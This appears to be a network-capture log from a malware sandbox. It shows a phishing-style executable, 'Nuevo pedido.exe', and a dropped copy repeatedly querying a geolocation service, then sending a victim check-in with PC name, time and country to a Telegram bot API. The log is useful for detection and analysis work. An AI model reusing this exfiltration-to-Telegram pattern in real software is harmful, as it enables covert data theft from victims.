                                                                                                                                          2025-01-09 15:36:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449750104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:09 UTC869INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:09 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751758
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FoCxulYdx6PzNKhjI%2FxRe1CBl8B6FSgezB0Rd8C46wan3%2FfKnX%2BEdr8D%2B0l27%2Byo6%2BxUM5T5FfVWhBoRepc7u5wkjX%2BimAhalk01z%2FkgaA48DhW5dvNfQGEVaauhR0vm%2FtuIP7xl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580523d218ce0-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1814&rtt_var=694&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1561497&cwnd=211&unsent_bytes=0&cid=f5610d274407d81a&ts=139&x=0"
                                                                                                                                          2025-01-09 15:36:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.449753104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:10 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:10 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751759
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdIw%2BlHlJSInzXlRemj8dr1icnxvHDfRkbbA9VJSNwI21Kv89LTAfnZ6dPGVPThQYL1q1b6wIPRTIy7OY9YJ13mqiXK7xLMqN6uznZq%2FiltBxkkxELiVPuhzYX9QYgfo6z3jpbD%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580587a4f0fa8-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1535&rtt_var=901&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1902280&cwnd=252&unsent_bytes=0&cid=3f223e3a70280095&ts=144&x=0"
                                                                                                                                          2025-01-09 15:36:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.449754104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:10 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:10 UTC863INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:10 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751759
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b89KPVWQ%2F2XDnjDoBX%2FpRm6fm4%2BxT%2BoTAdZx5WFaYccP8EX%2B0YOyXgUbnuVZ2N3Hvwe%2Blj68zBGVOxkSHJ4nLw73JZKX2CU3B6WXHWEbnVsEFDQjtHlTZgzfULrdqueYj%2FhOhoA2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580590e527293-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1974&rtt_var=746&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1479229&cwnd=158&unsent_bytes=0&cid=a2fa3976edf224f3&ts=164&x=0"
                                                                                                                                          2025-01-09 15:36:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.449758104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:11 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:11 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:11 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751760
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Symj2UFOt6%2FlYGLhKSGy097zyV9KzJw%2FefEg%2BYKDhGJlLxjZ2XPwNtwNeVFrORenSi185P3SnScfNs3nkmVyC2QXWZAGb81ztOcmBBBvckRL0%2B0QWfSYgEQf7EUYluza73ITmpDu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff5806039798ce0-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1792&rtt_var=674&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1622222&cwnd=211&unsent_bytes=0&cid=d3d68b42967d75f1&ts=162&x=0"
                                                                                                                                          2025-01-09 15:36:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.449757104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:11 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:11 UTC851INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:11 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751760
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWxpg6gfpLyB5tS1RzPMkJGozxOrcR1vDxXYDoCeC6f4SxDk6qVco14UA7cIVSVA9DNKU52td8vaY14ppprhY0kHc7jd6TfhgXEF%2BlWex9yaKsQWmpknqFKKfl8FVLtPiBnJPFqQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580607bfe41ba-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1699&rtt_var=638&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1718658&cwnd=192&unsent_bytes=0&cid=ea2f26ad36205a40&ts=349&x=0"
                                                                                                                                          2025-01-09 15:36:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.449761104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:12 UTC861INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:12 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751761
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCJPwW50kk5zIToEEuT6W8q0IBgfLkgAgIOcVbUKX%2B3BQD%2B0cctbtMuncmvDFJTum48I7CA4J%2BAYIYRGFXrVe6B14%2F%2BbDtaKlTqiMYLUeAaOexp%2F3ZNBlT3Dp5RR6TCq7MAa0kGH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580672da741ba-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1727&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1637689&cwnd=192&unsent_bytes=0&cid=7bc19cb55d1372a4&ts=153&x=0"
                                                                                                                                          2025-01-09 15:36:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.449762104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:12 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:12 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751761
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7j%2Bebh2f5Ovva76LywkUD0gjcnPNj%2FPIxImKHJS%2BSLgnhIIyLDhznpzA6BgnvGAcGCfBUaAgQSLjStCDz3bOvPxEiorvdP3kgHSVWimekEn6ZpehNQ5rpxkzNQ%2Bc87HawkbC4Y7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580684a7c4388-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1615&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1796923&cwnd=221&unsent_bytes=0&cid=3b15fbf7036f5ee5&ts=293&x=0"
                                                                                                                                          2025-01-09 15:36:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.449763149.154.167.2204437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:13 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:13 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:13 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2025-01-09 15:36:13 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.449766104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:13 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:13 UTC853INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:13 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751763
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=frnT7hBHoszLLQq0BRRr9ziiujC2N%2FlLFMoC0UgSYL8nkNrcdZPPzcQKv6yLc41uppoaVbG2Mf1c5LFsAV3DYTi%2BAl6DrvOP99IoiWWgUj38uY1qpcBSzgkUBKTIr3lJUfhxqKzU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff5806f0f908ce0-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1810&rtt_var=689&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1576673&cwnd=211&unsent_bytes=0&cid=21e9dbd6da336ddb&ts=144&x=0"
